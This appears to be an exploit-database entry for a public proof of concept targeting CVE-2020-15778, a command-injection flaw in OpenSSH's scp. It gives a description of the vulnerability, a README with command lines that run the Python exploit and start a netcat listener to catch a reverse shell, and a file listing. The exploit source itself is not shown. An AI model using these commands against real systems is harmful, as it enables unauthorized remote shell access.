CVE-2020-15778 PoC — OpenSSH OS Command Injection Vulnerability

Source
Associated Vulnerability
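Title: OpenSSH OS Command Injection Vulnerability (CVE-2020-15778)
Description: OpenSSH (OpenBSD Secure Shell) is a suite of connectivity tools for secure access to remote computers, developed by the OpenBSD project group in Canada. It is an open-source implementation of the SSH protocol that supports encrypting all traffic, which effectively prevents eavesdropping, connection hijacking and other network-level attacks. An OS command injection vulnerability exists in the scp.c file of scp in OpenSSH 8.3p1 and earlier. The vulnerability arises because the network system or product does not properly filter special characters, commands and similar elements when it constructs an executable OS command from external input data. An attacker can exploit this vulnerability to execute illegal OS commands.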
Description
Exploit for CVE-2020-15778(OpenSSH vul)
Readme
# CVE-2020-15778-Exploit
## Exploit for CVE-2020-15778(OpenSSH vul)  
Example: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
You need to use netcat to listen on the port before using the Python script  
Example: nc -lvp 1234  
1. Screenshot of using the script  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/1.PNG)  
2. Screenshot of getting a shell  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/2.PNG)  
  
2021-7-21 Update Log:  
Uses python-nmap to check host status  
Usage: python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
Run "pip3 install python-nmap" before you use the Update version of the script  
XD
File Snapshot

[4.0K] /data/pocs/9f77b4717f9d9917ba826ad9aa8af63b4514c8fb
├── [1.6K] CVE-2020-15778.py
├── [2.0K] CVE-2020-15778-Update.py
├── [4.0K] img
│   ├── [ 62K] 1.PNG
│   └── [ 15K] 2.PNG
└── [ 725] README.md

1 directory, 5 files